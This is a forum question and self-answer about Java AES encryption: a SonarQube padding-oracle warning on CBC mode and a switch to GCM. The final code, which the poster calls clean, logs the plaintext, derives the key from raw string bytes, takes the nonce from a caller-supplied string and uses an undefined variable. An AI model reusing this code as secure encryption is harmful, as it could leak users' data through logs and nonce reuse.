Hello currently i have to do an AES encription and send it to an external SW but i am having trouble with the sonarqube.
this is the relevant part of my current code:
String encriptedPad = afegir0Multiple8(Hex.encodeHexString(encriptar.getBytes()));
String cadenaAmb0 = afegir0Multiple8(encriptar); //Creem un cadena amb la longitut que necessitem
byte[] cadenaRes = cadenaAmb0.getBytes(); //Cadena resultant per encriptar
//Clau
byte[] hexclaub = DatatypeConverter.parseHexBinary(claveCifradoRedsa);
SecretKeySpec key = new SecretKeySpec(ArrayUtils.addAll(hexclaub,ArrayUtils.subarray(hexclaub,0,8)), "AES");
//Vector Init
String v = vectorInicial;
IvParameterSpec ivectorSpecv = new IvParameterSpec(v.getBytes("UTF-8"));
//Encriptem
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
cipher.init(Cipher.ENCRYPT_MODE, key, ivectorSpecv);
byte[] encrypted = cipher.doFinal(cadenaRes);
Is a little spaguetti cause it´s recyclated for an old code (TripleDES) sorry for that. But we can get the gist of it that`s that we are using an AES configuration with AES/CBC/PKCS5PADDING
the thing is that our sonarqube is getting this output when i send this code:
Could someone explain me a little about oracle padding attacks and if there is some impact using the instance recommended by sonar? I am quite lost with encryption
pd: The SW has accepted to change the configuration but i would like to understand why i have to use one specific configuration above others
thanks
Advertisement
Answer
Well the question is already solved thanks to @Topaco in the comments below. I will update my code here in order to make this question answered.
My current Code looks like this:
@Override
public Map execute(Map in) throws Exception {
log.info("********** CIFRADO AES ACTION ****************");
Map params = (Map) in.get("request_params");
Map resultado = new HashMap();
resultado.put("clave", encriptarAES((String) in.get("encriptar"),(String) in.get("claveCifrado"),(String) in.get("vectorInicial")));
return resultado;
}
private String encriptarAES(String encriptar, String claveCifradoRedsa, String vectorInicial) throws Exception {
SecretKey key = new SecretKeySpec(claveCifradoRedsa.getBytes(), "AES");
key = new SecretKeySpec(key.getEncoded(), "AES");
//Encriptem
GCMParameterSpec ivParameterSpec = new GCMParameterSpec(128, vectorInicial.getBytes());
Cipher cipher = Cipher.getInstance(instance);
cipher.init(Cipher.ENCRYPT_MODE, key, ivParameterSpec);
byte[] encrypted = cipher.doFinal(encriptar.getBytes());
String codificado64 = Base64.getUrlEncoder().encodeToString(encrypted);
log.info(encriptar);
log.info(codificado64);
log.info("************************ FIN CIFRADO AES ACTION ***********************");
return codificado64;
}
I think it a pretty clean example of AES encryption, hope it´s useful to someone